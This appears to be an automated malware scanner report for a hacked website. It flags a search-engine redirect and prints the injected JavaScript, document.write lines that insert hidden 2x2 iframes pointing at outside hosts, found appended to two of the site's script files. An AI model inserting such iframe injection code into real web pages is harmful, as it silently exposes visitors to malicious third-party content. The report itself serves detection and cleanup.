New scan:

Malware Scanner report for mhs-lhs-77.com

Malicious/Suspicious/Total urls checked
2/0/5
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://eosusa.com/cewf.html?h=1344450
120 websites infected.

The website "mhs-lhs-77.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/4/5
4 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://mhs-lhs-77.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: mhs-lhs-77.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Mon, 08 Jun 2015 00:39:58 GMT
Location: http://eosusa.com/cewf.html?h=1344450
Server: Apache/2.4.7 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Length: 221
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://mhs-lhs-77.com/
200 OK
Content-Length: 2475
Content-Type: text/html
clean
http://musecdn.businesscatalyst.com/scripts/1.1/jquery-1.7.min.js
200 OK
Content-Length: 33231
Content-Type: application/x-javascript
clean
http://mhs-lhs-77.com/scripts/1.1/sprydomutils.js?222635312
200 OK
Content-Length: 14873
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=1344450></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?j=1344450></iframe>');

(function(){if(typeof Spry=="undefined")window.Spry={};if(!Spry.Utils)Spry.Utils={};Spry.$=function(a){if(arguments.length>1){for(v
... 3268 bytes are skipped ...
stener(e,a,b,c,d)})};Spry.$$.Results.removeEventListener=function(a,b,c){return this.forEach(function(d){Spry.Utils.removeEventListener(d,a,b,c)})};Spry.$$.Results.setStyle=function(a){a&&(a=Spry.Utils.styleStringToObject(a),this.forEach(function(b){for(var c in a)try{b.style[c]=a[c]}catch(d){}}));return this};Spry.$$.Results.setProperty=function(a,b){if(a){if(typeof a=="string"){var c={};
c[a]=b;a=c}this.forEach(function(b){for(var c in a)try{b[c]=a[c]}catch(f){}})}return this}})();

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://dentazone.com/ozei.html?j=1344450

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?j=1344450>

Hidden iFrame found.
size: 2x2     
src: http://thecardoctorsales.co.uk/aeef.html?j=1344450

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=1344450>

http://mhs-lhs-77.com/scripts/1.1/museutils.js?4051851185
200 OK
Content-Length: 13266
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=1344450></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?j=1344450></iframe>');

if(typeof Muse=="undefined")window.Muse={};Muse.Assert={};Muse.Assert.fail=function(a){alert("MuseJSAssert: "+a)};$.extend($.browser,{
... 3172 bytes are skipped ...
lass("disn");jQuery(".invi").removeClass("invi");jQuery(".widget_invisible").removeClass("widget_invisible")};
Muse.Utils.refreshIframesAndObjectsToPauseMedia=function(a){a.filter(function(){return $(this).css("display")!="none"}).each(function(){$("iframe, object",this).each(function(){var a=$(this).next();a.length==0?(a=$(this).parent(),$(this).detach().appendTo(a)):$(this).detach().insertBefore(a)});$("video",this).each(function(){$(this).get(0).pause&&$(this).get(0).pause()})})};

Antivirus reports:

Norman
Iframe.UW

Hidden iFrame found.
size: 2x2     
src: http://dentazone.com/ozei.html?j=1344450

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?j=1344450>

Hidden iFrame found.
size: 2x2     
src: http://thecardoctorsales.co.uk/aeef.html?j=1344450

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=1344450>

http://mhs-lhs-77.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mhs-lhs-77.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mhs-lhs-77.com/

Result: mhs-lhs-77.com is not infected or malware details are not published yet.